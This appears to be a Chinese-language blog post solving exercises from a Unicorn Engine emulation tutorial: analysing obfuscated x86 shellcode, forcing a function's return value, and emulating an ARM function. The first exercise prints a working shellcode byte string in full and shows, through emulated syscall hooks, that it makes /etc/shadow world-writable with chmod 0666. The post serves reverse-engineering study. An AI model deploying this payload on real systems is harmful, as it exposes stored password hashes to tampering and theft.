Unicorn Engine初体验

0x00:关于unicorn engine

Unicorn Engine是一个模拟器(emulator),简单的来说就是可以模拟执行程序or片段的代码。对于逆向分析来说很有用,比如分析某个片段的代码的作用;对于漏洞挖掘选手来说,前一段时间的unicorn-afl着实亮眼,不过有带更深入的研究。

0x01:关于本文

很巧,今天玄武推送推了一篇Unicorn Engine tutorial,感觉写的很好,作者也很有趣,文章中还布置了home work,哈哈哈,上班的时候没时间做,下班回到家就看了看,模仿者第一个例子,和作者给出的hint把两个home work做了下。

0x02: shellcode分析

作者在这里给出了一段混淆过的shellcode,直接反汇编器查看的话,并不能直接分析出这段shellcode的作用。

1
shellcode = "\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"
1
2
3
4
5
6
7
# muhe @ muheMacBookPro in /tmp [22:38:29]
$ python -c 'shellcode = "\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80";print shellcode' > sc.dump

# muhe @ muheMacBookPro in /tmp [22:38:37]
$ file sc.dump
sc.dump: data

用r2分析的话:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
[0x00000000]> pd
0x00000000 e8ffffffff call 4
0x00000005 c05d6a05 rcr byte [rbp + 0x6a], 5
0x00000009 5b pop rbx
0x0000000a 29dd sub ebp, ebx
0x0000000c 83c54e add ebp, 0x4e ; 'N'
0x0000000f 89e9 mov ecx, ebp
0x00000011 6a02 push 2 ; 2
0x00000013 030c24 add ecx, dword [rsp]
0x00000016 5b pop rbx
0x00000017 31d2 xor edx, edx
0x00000019 66ba1200 mov dx, 0x12 ; 18
┌─> 0x0000001d 8b39 mov edi, dword [rcx]
⁝ 0x0000001f c1e710 shl edi, 0x10
⁝ 0x00000022 c1ef10 shr edi, 0x10
⁝ 0x00000025 81e9feffffff sub ecx, 0xfffffffe
⁝ 0x0000002b 8b4500 mov eax, dword [rbp]
⁝ 0x0000002e c1e010 shl eax, 0x10
⁝ 0x00000031 c1e810 shr eax, 0x10
⁝ 0x00000034 89c3 mov ebx, eax
⁝ 0x00000036 09fb or ebx, edi
⁝ 0x00000038 21f8 and eax, edi
⁝ 0x0000003a f7d0 not eax
⁝ 0x0000003c 21d8 and eax, ebx
⁝ 0x0000003e 66894500 mov word [rbp], ax
⁝ 0x00000042 83c502 add ebp, 2
⁝ 0x00000045 4a85d2 test rdx, rdx
└─< 0x00000048 0f85cfffffff jne 0x1d
0x0000004e ec in al, dx
0x0000004f 37 invalid
┌─< 0x00000050 755d jne 0xaf
┌──< 0x00000052 7a05 jp 0x59
││ 0x00000054 28ed sub ch, ch
││ 0x00000056 24ed and al, 0xed
││ 0x00000058 24ed and al, 0xed
│ 0x0000005a 0b887feb5098 or ecx, dword [rax - 0x67af1481]
│ 0x00000060 38f9 cmp cl, bh
│ 0x00000062 5c pop rsp
│ 0x00000063 96 xchg eax, esi
│ 0x00000064 2b9670fec6ff sub edx, dword [rsi - 0x390190]
│ 0x0000006a c6 invalid
│ 0x0000006b ff9f321f581e lcall [rdi + 0x1e581f32]
│ 0x00000071 00d3 add bl, dl
│ 0x00000073 800aff or byte [rdx], 0xff
│ 0x00000076 ff invalid
│ 0x00000077 ff invalid
│ 0x00000078 ff invalid
│ 0x00000079 ff invalid
│ 0x0000007a ff invalid
│ 0x0000007b ff invalid

事实是啥都看不出来,但是作者说:

1
Note that the architecture is x86-32 now. List of syscalls numbers can be found here.

32位的,而且是调用了系统调用搞事情的。
那就可以模仿文中的例子,模拟执行这段代码,然后对系统调用打hook,把参数print出来,然后再跳过去。

根据资料,调用号放在eax寄存器,参数的顺序是:ebx,ecx,edx,esi,edi。
下面就是hook了int 80h指令,然后搞事情。

我的hook函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def hook_code(mu, address, size, user_data):
op_code = mu.mem_read(address, size)
if op_code == "\xcd\x80":
call_number = mu.reg_read(UC_X86_REG_EAX)
param1 = mu.reg_read(UC_X86_REG_EBX)
param2 = mu.reg_read(UC_X86_REG_ECX)
param3 = mu.reg_read(UC_X86_REG_EDX)
param4 = mu.reg_read(UC_X86_REG_ESI)
param5 = mu.reg_read(UC_X86_REG_EDI)

print ("[*]Result as followed:")

print ("\tCall number: {0}".format(call_number))
print ("\tParam1 : {0}".format(param1))
print ("\tParam2 : {0}".format(param2))
print ("\tParam3 : {0}".format(param3))
print ("\tParam4 : {0}".format(param4))
print ("\tParam5 : {0}".format(param5))

mu.reg_write(UC_X86_REG_EIP, address + size)

运行结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 $ python task1.py
[*]Result as followed:
Call number: 15
Param1 : 4194392
Param2 : 438
Param3 : 0
Param4 : 0
Param5 : 32979
[*]Result as followed:
Call number: 1
Param1 : 4194392
Param2 : 438
Param3 : 0
Param4 : 0
Param5 : 32979

第四、第五个参数应该没用到,第一次调用时15号调用,第二次是1号调用。查了一下,15号是chmod,1号是exit。
chmod的参数应该是文件名,权限。exit的参数的话,就是4194392。

就是想办法确定chmod操作了什么文件,4194392应该是一个指针。修改hook函数:

1
2
3
4
5
6
7
8

print ("\tCall number: {0}".format(call_number))
if call_number == 15:
file = mu.mem_read(param1, 32).split("\x00")[0]
print ("\t[*]File is {0}".format(file))
else:
print ("\tParam1 : {0}".format(param1))

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[*]Result as followed:
Call number: 15
[*]File is /etc/shadow
Param2 : 438
Param3 : 0
Param4 : 0
Param5 : 32979
[*]Result as followed:
Call number: 1
Param1 : 4194392
Param2 : 438
Param3 : 0
Param4 : 0
Param5 : 32979

chmod的第二个参数其实就是0666:

1
2
3
>>> oct(438)
'0666'
>>>

到此,分析完毕。

0x03: 修改函数的返回值

修改下面程序的逻辑,使得返回值是1。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
int strcmp(char *a, char *b)
{
//get length
int len = 0;
char *ptr = a;
while(*ptr)
{
ptr++;
len++;
}

//comparestrings
for(int i=0; i<=len; i++)
{
if (a[i]!=b[i])
return 1;
}

return 0;
}

__attribute__((stdcall))
int super_function(int a, char *b)
{
if (a==5 && !strcmp(b, "batman"))
{
return 1;
}
return 0;
}

int main()
{
super_function(1, "spiderman");
}

这个也好做,直接调用super_function,然后根据栈的结构,直接把参数改了,因为是x86,c语言的调用约定是从右到左依次压栈,所以字符串spiderman的指针是第一个压栈的。

1
2
3
4
5
6
...
saved ebp
ret addr
1
ptr ---> "spiderman\0"
...

大概就是上面这样。

这部分比较容易,自己编译一个这个程序,然后找一下super_function函数的开头和结尾。

这个bin文件在mac上编译出来,地址啥的不一样,写脚本的时候要注意,bin文件映射地址最好是ida里分析的文件起始地址,这样的话,后面调用super func的时候,地址啥的可以直接用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from unicorn import *
from unicorn.x86_const import *
import struct


def read(name):
with open(name) as f:
return f.read()

def u32(data):
return struct.unpack("I", data)[0]

def p32(num):
return struct.pack("I", num)

mu = Uc (UC_ARCH_X86, UC_MODE_32)

BASE = 0x00000000
STACK_ADDR = 0x40000000
STACK_SIZE = 1024*1024

mu.mem_map(BASE, 1024*1024)
mu.mem_map(STACK_ADDR, STACK_SIZE)


mu.mem_write(BASE, read("./function"))
r_esp = STACK_ADDR + (STACK_SIZE/2) #ESP points to this address at function call

STRING_ADDR = 0x40000000
mu.mem_write(STRING_ADDR, "batman\x00") #write "batman" somewhere. We have choosen an address 0x0 which belongs to the stack.

mu.reg_write(UC_X86_REG_ESP, r_esp) #set ESP
mu.mem_write(r_esp+4, p32(5)) #set the first argument. It is integer 5
mu.mem_write(r_esp+8, p32(STRING_ADDR)) #set the second argument. This is a pointer to the string "batman"


mu.emu_start(0x0000057B, 0x000005B1) #start emulation from the beginning of super_function, end at RET instruction
return_value = mu.reg_read(UC_X86_REG_EAX)
print "The returned value is: %d" % return_value
1
2
3
4
# muhe @ muheMacBookPro in ~/Downloads [15:19:10]
$ python task2.py
The returned value is: 1

0x04: arm32的一个cm

类似于作者原文的第一个demo,就是那个ctf题目,只不过这次arch换成了arm32,注意大小端。

1
2
3
4
5
6
7
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
int v3; // r0

v3 = ccc(0x2710u, (int)argv, (int)envp);
printf((const char *)&unk_745A4, v3);
}

在没有arm环境的情况下,使用unicorn来得出这个函数结算结果-。- 虽然我有arm环境 2333333

搜了一下arm传参的方式:

  1. 输入参数通过r0-r3传递,多余的放入堆栈中;返回值放入r0,不够的话放入{r0,r1}或者{r0,r1,r2,r3},比如:
    int foo(int a, int b, int c, int d), 输入:r0 = a, r1 = b, r2 = c, r3 = d,返回:r0 = 类型为int的retvalue
    int *foo(char a, double b, int c, char d), 输入:r0 = a, r1用于对齐(double 要求8字节对齐), b = {r2, r3},c放在堆栈的sp[0]位置,d放在堆栈的sp[4]位置,这里的sp是指进入函数时的sp;返回:r0 = 类型为int *的retvalue

  2. 注意如果返回值是结构体,情况有些特殊:
    struct client foo(int a, char b, float c), 输入:r0 = 一个strcut client *变量,由调用者给出, r1 = a, r2 = b, r3 = c;返回:strcut client *变量,和调用者给的一样

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from unicorn import *
from unicorn.arm_const import *
import struct


def read(name):
with open(name) as f:
return f.read()

def u32(data):
return struct.unpack("I", data)[0]

def p32(num):
return struct.pack("I", num)


mu = Uc (UC_ARCH_ARM, UC_MODE_LITTLE_ENDIAN)

BASE = 0x10000
STACK_ADDR = 0x300000
STACK_SIZE = 1024*1024

mu.mem_map(BASE, 1024*1024)
mu.mem_map(STACK_ADDR, STACK_SIZE)


mu.mem_write(BASE, read("./task4_arm"))

mu.reg_write(UC_ARM_REG_SP, STACK_ADDR + STACK_SIZE/2)

instructions_skip_list = []

CCC_START = 0x000104D0
CCC_END = 0x00010580

stack = [] # Stack for storing the arguments
d = {} # Dictionary that holds return values for given function arguments

def hook_code(mu, address, size, user_data):
if address == CCC_START: # Are we at the beginning of ccc function?
arg0 = mu.reg_read(UC_ARM_REG_R0) # Read the first argument. it is passed by R0

if arg0 in d: # Check whether return value for this function is already saved.
ret = d[arg0]
mu.reg_write(UC_ARM_REG_R0, ret) # Set return value in R0
mu.reg_write(UC_ARM_REG_PC, 0x105BC) # Set PC to point at "BX LR" instruction. We want to return from fibonacci function

else:
stack.append(arg0) # If return value is not saved for this argument, add it to stack.

elif address == CCC_END:
arg0 = stack.pop() # We know arguments when exiting the function

ret = mu.reg_read(UC_ARM_REG_R0) # Read the return value (R0)
d[arg0] = ret


mu.hook_add(UC_HOOK_CODE, hook_code)

mu.emu_start(0x00010584, 0x000105A8)

print "ret:{0}".format(mu.reg_read(UC_ARM_REG_R1))

1
2
3
# muhe @ muheMacBookPro in ~/Downloads [15:34:12]
$ python task4.py
ret:2635833876

0x05: 参考

Unicorn Engine tutorial

arm平台函数传递参数,反汇编实例分析